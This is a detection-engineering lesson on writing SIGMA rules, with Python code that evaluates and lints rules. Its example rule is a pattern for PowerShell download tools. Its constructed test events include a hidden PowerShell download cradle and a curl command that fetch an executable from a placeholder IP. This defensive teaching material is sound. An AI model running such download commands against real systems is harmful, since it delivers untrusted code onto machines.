Detection Engineering / Module 1: Foundations / Lesson 1.3
20 min

Introduction to SIGMA

Learn the SIGMA rule format - the universal language for detection rules that works across any SIEM.


SIGMA is an open standard for writing detection rules in a vendor-agnostic YAML format. Think of it as "YARA for logs": a rule describes the log source and the field patterns to match using generic, normalized names, and a converter renders that one rule into the query language of whichever SIEM you run.

Why SIGMA?

Before SIGMA, detection rules were written in proprietary formats:

  • Splunk SPL
  • Elastic Query DSL
  • Microsoft KQL
  • Sumo Logic queries

    This created problems:

  • Rules couldn't be shared across tools
  • Changing SIEMs meant rewriting everything
  • Community rules were fragmented

    SIGMA solves this with a universal format.

    SIGMA Rule Structure

    Every SIGMA rule has the same basic structure:

    title: Suspicious PowerShell Download
    status: experimental
    description: Detects PowerShell downloading files from the internet
    logsource:                      # which logs the rule applies to
        category: process_creation
        product: windows
    detection:
        selection:                  # a map: every field here must match (AND)
            CommandLine|contains:   # a list of values under one field: any may match (OR)
                - 'Invoke-WebRequest'
                - 'wget'
                - 'curl'
                - 'DownloadFile'
            Image|endswith: '\powershell.exe'
        condition: selection        # fire when the named search matches
    level: medium
    tags:
        - attack.execution          # ATT&CK tactic
        - attack.t1059.001          # ATT&CK technique: PowerShell
    

    Key Components

    Title & Status
  • title: Clear, descriptive name
  • status: experimental, test, stable, or deprecated

    Description Explain what the rule detects and why it matters.

    Logsource Defines what logs this rule applies to:
  • category: process_creation, network_connection, file_event, etc.
  • product: windows, linux, macos, aws, etc.
  • service: sysmon, security, powershell, etc.

    Detection The actual detection logic:
  • Named searches: any key other than condition (conventionally selection, and filter_* for exclusions). A search is a map of field: value pairs that must all match (AND); a list of values under one field matches if any of them does (OR); a list of maps is OR across the maps
  • filter: Not a keyword, just the naming convention for a search you want to exclude
  • condition: Combines the named searches with and, or, not and parentheses, e.g. selection and not filter

    Modifiers SIGMA supports modifiers, appended to the field name with |, to control how a value is matched. String matching is case-insensitive, and a plain value may use * and ? as wildcards:
  • |contains: Field contains the value
  • |endswith: Field ends with the value
  • |startswith: Field starts with the value
  • |re: Regular expression match (case-sensitive, and usually the most expensive operation for the SIEM)
  • |all: Added after another modifier (e.g. |contains|all), turns a value list from OR into AND

    Level Severity of the detection. The specification defines five values:
  • informational: Context or enrichment only, not an alert on its own
  • low: Notable but rarely an incident; useful when correlated
  • medium: Worth investigating; review regularly
  • high: Likely malicious; should raise an alert for prompt review
  • critical: Almost certainly an attack; treat as an incident

    Tags Namespaced references to MITRE ATT&CK and other frameworks: attack.<tactic> (e.g. attack.execution) and attack.tNNNN or attack.tNNNN.NNN for techniques and sub-techniques (e.g. attack.t1059.001). Other namespaces include car., cve. and tlp.
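The matching semantics described above (a map is AND, a value list is OR unless |all, the condition joins named searches with and/or/not) are easiest to understand by running them. The following is an added example, not code from the lesson or from the Sigma project: a minimal evaluator for the detection block, run over constructed Sysmon-style process_creation events. The rule mirrors the lesson's example, with a hypothetical filter_trusted_parent exclusion added to show how a filter works; the events and the parent process names are made up for the demonstration.

```python
import re

# Constructed rule mirroring the lesson's example, as a Python dict (a real rule
# is YAML: load it with yaml.safe_load from PyYAML). The filter search and the
# "TrustedUpdater.exe" parent are hypothetical, added only to show exclusions.
RULE = {
    "title": "Suspicious PowerShell Download",
    "logsource": {"category": "process_creation", "product": "windows"},
    "detection": {
        "selection": {
            "CommandLine|contains": ["Invoke-WebRequest", "wget", "curl", "DownloadFile"],
            "Image|endswith": "\\powershell.exe",
        },
        "filter_trusted_parent": {"ParentImage|endswith": "\\TrustedUpdater.exe"},
        "condition": "selection and not filter_trusted_parent",
    },
}

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [  # constructed Sysmon-style process_creation events, not real telemetry
    {"Image": PS, "ParentImage": r"C:\Windows\System32\cmd.exe",  # download cradle: should hit
     "CommandLine": "powershell -nop -w hidden -c \"(New-Object Net.WebClient).DownloadFile('http://203.0.113.10/a.exe','a.exe')\""},
    {"Image": PS, "ParentImage": r"C:\Program Files\Vendor\TrustedUpdater.exe",  # excluded by the filter
     "CommandLine": "powershell -c Invoke-WebRequest http://203.0.113.10/u.ps1"},
    {"Image": r"C:\Windows\System32\curl.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",  # not powershell.exe
     "CommandLine": "curl.exe -O http://203.0.113.10/a.exe"},
]


def _match_one(actual: str, modifiers: list, pattern: str) -> bool:
    """Apply Sigma string modifiers to one value. Sigma string matching is
    case-insensitive; |re is a raw regular expression (case-sensitive here)."""
    if "re" in modifiers:
        return re.search(pattern, actual) is not None
    a, p = actual.lower(), pattern.lower()
    if "contains" in modifiers:
        return p in a
    if "startswith" in modifiers:
        return a.startswith(p)
    if "endswith" in modifiers:
        return a.endswith(p)
    return a == p  # no modifier: exact match (Sigma's * and ? wildcards not handled here)


def _match_field(event: dict, spec: str, pattern) -> bool:
    """'Field|mod1|mod2': value -> does the event's Field match?
    A list of values is OR, unless the |all modifier turns it into AND."""
    field, *modifiers = spec.split("|")
    if field not in event:
        return False
    values = pattern if isinstance(pattern, list) else [pattern]
    hits = [_match_one(str(event[field]), modifiers, str(v)) for v in values]
    return all(hits) if "all" in modifiers else any(hits)


def _match_search(event: dict, search) -> bool:
    """A map is AND over its fields; a list of maps is OR over the maps."""
    if isinstance(search, list):
        return any(_match_search(event, s) for s in search)
    return all(_match_field(event, k, v) for k, v in search.items())


def _eval_condition(condition: str, results: dict) -> bool:
    """Recursive-descent evaluator for identifier / and / or / not / () conditions.
    Sigma's '1 of selection*' and 'all of them' forms are not handled here."""
    tokens = re.findall(r"\(|\)|\w+", condition)
    pos = 0

    def take():
        nonlocal pos
        pos += 1
        return tokens[pos - 1]

    def expr():    # expr := term ('or' term)*
        value = term()
        while pos < len(tokens) and tokens[pos] == "or":
            take()
            value = term() or value
        return value

    def term():    # term := factor ('and' factor)*
        value = factor()
        while pos < len(tokens) and tokens[pos] == "and":
            take()
            value = factor() and value
        return value

    def factor():  # factor := 'not' factor | '(' expr ')' | search name
        tok = take()
        if tok == "not":
            return not factor()
        if tok == "(":
            value = expr()
            if take() != ")":
                raise ValueError("unbalanced parentheses in condition")
            return value
        return results[tok]  # KeyError if the condition names an undefined search

    value = expr()
    if pos != len(tokens):
        raise ValueError(f"unexpected token {tokens[pos]!r} in condition")
    return value


def evaluate(rule: dict, event: dict) -> bool:
    """True if the event satisfies the rule's detection block."""
    detection = rule["detection"]
    results = {name: _match_search(event, search)
               for name, search in detection.items() if name != "condition"}
    return _eval_condition(detection["condition"], results)


def run_rule(rule: dict, events: list) -> list:
    """Indexes of the events that fire the rule."""
    return [i for i, e in enumerate(events) if evaluate(rule, e)]
```

Running `run_rule(RULE, EVENTS)` returns `[0]`: the first event matches on DownloadFile and powershell.exe, the second also matches the selection but is excluded by the filter, and the third is curl.exe rather than powershell.exe, so the Image test fails. Note that the filter is applied in the condition (`and not`), not by some special meaning of the word "filter".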

    Converting SIGMA Rules

    The power of SIGMA is conversion. The sigma-cli tool (built on the pySigma library) converts rules through backend plugins, one per target, including:

  • Splunk SPL
  • Elastic Query DSL
  • Microsoft Sentinel KQL
  • Chronicle YARA-L
  • And many more...

    A backend renders the query syntax; a processing pipeline (-p) maps the generic logsource and field names onto the target's real schema, for example the sysmon pipeline maps category process_creation to Sysmon Event ID 1. Without a suitable pipeline the converter has no way to know which index or event type a generic logsource refers to.

    pip install sigma-cli
    sigma plugin install splunk      # backend for the target SIEM
    sigma plugin install sysmon      # pipeline, if it is not already listed
    sigma list targets               # backends installed
    sigma list pipelines             # pipelines available
    sigma convert -t splunk -p sysmon rule.yml
    

    Writing Good SIGMA Rules

  • Be specific: Avoid overly broad patterns
  • Document well: Future you will thank you
  • Consider performance: Avoid expensive operations
  • Test thoroughly: Validate before deployment
  • Use standard fields: Stick to normalized field names
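Most of the guidance above can be checked mechanically before a rule is deployed (sigma-cli's sigma check validates rules against the specification; this is a lighter, self-contained version of that idea). The following is an added example, not code from the lesson or from the Sigma project: a small linter that checks required fields, allowed status and level values, that every search the condition references exists and every defined search is used, that fields are standard names for the logsource category, that tags are namespaced, and two heuristics for specificity and performance. The standard-field table is a hand-maintained subset I assumed for process_creation, and the short-pattern threshold of four characters is an arbitrary choice; the bad rule is constructed to trip the checks.

```python
import fnmatch
import re

# Allowed values from the Sigma rule specification.
VALID_STATUS = {"stable", "test", "experimental", "deprecated", "unsupported"}
VALID_LEVEL = {"informational", "low", "medium", "high", "critical"}
COND_KEYWORDS = {"and", "or", "not", "of", "them", "all"}
TAG_NAMESPACES = ("attack.", "car.", "cve.", "tlp.", "detection.")
ATTACK_TAG = re.compile(r"^attack\.(t\d{4}(\.\d{3})?|[gs]\d{4}|[a-z_]+)$")
# Assumption: a hand-maintained subset of Sigma's standard field names per category.
KNOWN_FIELDS = {
    "process_creation": {"Image", "CommandLine", "ParentImage", "ParentCommandLine", "User",
                         "OriginalFileName", "CurrentDirectory", "IntegrityLevel", "Hashes"},
}

GOOD_RULE = {  # the lesson's rule as a dict (a real rule is YAML: yaml.safe_load)
    "title": "Suspicious PowerShell Download", "status": "experimental",
    "description": "Detects PowerShell downloading files from the internet",
    "logsource": {"category": "process_creation", "product": "windows"},
    "detection": {"selection": {"CommandLine|contains": ["Invoke-WebRequest", "wget", "curl", "DownloadFile"],
                                "Image|endswith": "\\powershell.exe"},
                  "condition": "selection"},
    "level": "medium", "tags": ["attack.execution", "attack.t1059.001"],
}
BAD_RULE = {  # constructed counter-example that violates the guidance above
    "title": "PowerShell", "status": "beta", "level": "med", "tags": ["T1059.001"],
    "logsource": {"category": "process_creation", "product": "windows"},
    "detection": {"selection": {"process_name|contains": "ps", "CommandLine|re": ".*http.*"},
                  "condition": "selection and not filter"},
}


def _fields(search):
    """Yield (spec, pattern) pairs from a search map or a list of maps."""
    for part in (search if isinstance(search, list) else [search]):
        if isinstance(part, dict):
            yield from part.items()


def lint(rule: dict) -> list:
    """Return a list of findings; an empty list means the rule passed every check."""
    findings = []
    for key in ("title", "logsource", "detection"):
        if key not in rule:
            findings.append(f"missing required field {key!r}")
    if not rule.get("description"):
        findings.append("missing description: document what the rule detects and why")
    if rule.get("status", "experimental") not in VALID_STATUS:
        findings.append(f"invalid status {rule['status']!r}")
    if rule.get("level", "informational") not in VALID_LEVEL:
        findings.append(f"invalid level {rule['level']!r}")

    detection = rule.get("detection", {})
    searches = {k: v for k, v in detection.items() if k != "condition"}
    condition = detection.get("condition", "")
    if not condition:
        findings.append("detection has no condition")
    referenced = set()
    for tok in re.findall(r"[\w*]+", condition):
        if tok in COND_KEYWORDS or tok.isdigit():
            continue
        hits = fnmatch.filter(searches, tok)  # handles 'selection_*' style wildcards
        if not hits:
            findings.append(f"condition references undefined search {tok!r}")
        referenced.update(hits)
    if "them" in condition.split():
        referenced.update(searches)
    for name in sorted(set(searches) - referenced):
        findings.append(f"search {name!r} is defined but never used in the condition")

    category = rule.get("logsource", {}).get("category")
    known = KNOWN_FIELDS.get(category)
    for name, search in searches.items():
        for spec, pattern in _fields(search):
            field, *mods = spec.split("|")
            if known is not None and field not in known:
                findings.append(f"{name}: {field!r} is not a standard {category} field")
            if "re" in mods:
                findings.append(f"{name}: |re on {field!r} is expensive in most SIEMs; "
                                "prefer contains/startswith/endswith")
            for value in (pattern if isinstance(pattern, list) else [pattern]):
                if "contains" in mods and len(str(value)) < 4:  # heuristic threshold
                    findings.append(f"{name}: {field}|contains {value!r} is too short to be specific")

    for tag in rule.get("tags", []):
        if not tag.startswith(TAG_NAMESPACES):
            findings.append(f"tag {tag!r} has no namespace (expected e.g. attack.t1059.001)")
        elif tag.startswith("attack.") and not ATTACK_TAG.match(tag):
            findings.append(f"tag {tag!r} is not a valid attack.<tactic> or attack.tNNNN tag")
    return findings
```

`lint(GOOD_RULE)` returns an empty list; `lint(BAD_RULE)` returns eight findings: no description, invalid status and level, a condition that references an undefined filter, a non-standard field name, a two-character contains pattern, a regular expression where a substring match would do, and a tag without the attack. namespace. Checks like these are cheap to run in CI on every rule change, which is where "test thoroughly" usually ends up living.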
    Key Takeaways

    • SIGMA is a vendor-agnostic detection rule format
    • Rules include logsource, detection logic, and metadata
    • Modifiers like |contains and |endswith enable pattern matching
    • SIGMA rules can be converted, with a backend and a pipeline, to the query language of any SIEM that has a backend